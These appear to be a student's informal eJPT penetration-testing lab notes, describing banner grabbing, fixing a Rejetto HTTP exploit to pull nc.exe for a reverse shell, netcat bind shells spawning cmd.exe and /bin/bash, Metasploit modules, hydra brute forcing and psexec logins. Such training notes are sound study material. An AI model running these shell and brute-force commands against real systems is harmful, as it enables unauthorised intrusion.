EJPT9
EJPT9
BANNER GRABBING(lab):
using banner grabbing to identify the services running o the target it has a ssh
lab whic is already done previously.
using nmap for banner grabbing:
nmap -sV --script=banner ip
From now if the vedio or ;lba has alreday done will skip and yea inf anything new
comes will write will skip nothing.
:)
Exploits:
THe first part was about searching the publicaly avilable exploits using eploitdb
and being careful to use verified exploits as sometimes the exploits may have
malicious code indside them and we cam also use google dork for searching for
exploits.
A useful webiste for gettinh new about exploits packetstorm
FIXING EXPLOITS:
We will be xploiting a windows vulnerable http server but this time using manual
approach.
To do we will use searchsploit:
the exploit we are going to use if rejjeto http vuln .
Let's copy the exploit from searchsploit to our root directory by searchsploit -m
exploit number
Then let's see what all is needed to configure etc.
We need to configure ip address to our local ip address and port no to port we will
use our netcat listener to .
For it to work perfectly we need to host our local machine on python http server
and and during exploitation the in the script we have asked to hots netcat script
on the python server so we do so copy the netcat script from the directory it is to
our home directory and also start a netcat listner on any port ny nc -nvlp port no
then we will will start our server and use the command python exploit.py ip python
server port no and it will download the netcat executable from our loclamachine
which it will use to conncet to our netcat connection we started earlier and give
us a rev shell done.
SHELLS:
NETCAT FUNDAMENTALS(lab):
this lab is about netcat using it put our files into target system inetracting
with target system downloading file to target using how to host using netcat banner
grabbing etc.
to connect tcp port nc -nv ip port
for udp
nc -nvu ip port
BIND SHELL():
It's about bind shell and executing tht onthe target system uisng netcat .
For executing nc bind shell we will transfer our nc.exe to windows by hosting
server on linux
We have transfered the nc.exe to the windows machine now we will use it to host a
bind shell nc.exe -nvlp 1234 -e cmd.exe
now connect to kalimachine using the command nc -nv ip port
if we wnna do opposite connect kali using windows
do
nc -nvlp -e /bin/bash
and connect on windows system using nc.exe -nv ip port
FRAMEWORKS:
MSF FRAMEWORK(lab):
Found alogin page for proccess maker admin page logged in using default creds and
serached in msf for modules found one php module rce used it got rce and got flag
from machine boom done .
---
WINDOWS BALCKBOX:
This is a blacckbox testing lab and it's like divided into different parts one
section for enumeration one for ssh exploitation one for smb exploitation and all
il try to solve all labs without vedio or walkthrough let's see
Inscanned the server and found many open ports first i did was exploiting ftp
server by using a bruteforce attack and got password for administrator.
Also found a smb server openssh jenkins and oracle fish let's exploit further.Found
a openssh server too lets's search for it's exploits using searchsploit and found a
username enumeration nothing much we will use ssh bruteforce let's see using hydra
for that.
we got a user vagrant and password vagrant let's use it and login ..
We loggedf in found nothing importnat let's move froward serach something else
Let's exploit smb :
bruteforcing smb and found the pass for aministrator vagrant.
Lets use enum4linux to enumerate user and bruteforce thier pass also .
Now tht we have creds we can use psexec to gain remote access.
Got stuck here forgot usage of psexec :(
So we will have to copy psexec to our current directory and prvide it executable
permisssions
cp /usr/share/psexec.py /root/Desktop and then chmod +x psexec.py
usage:
python3 psexec.py administrator@ip
and logged in
We can also use psexec module if don't want this much hassle lol
use exploit/windows/smb/psexec
Now we will exploit php had to see solution for this one it's easy ik ye but was
confused for something :(
using the php msf module for cgi ijection .
and get meterpreter shell .
We can also use this msf oduke to exploit samaba use
exploit/multi/samba/usermap_script.
Done linux blackbox.
OBFUSCATION(no lab):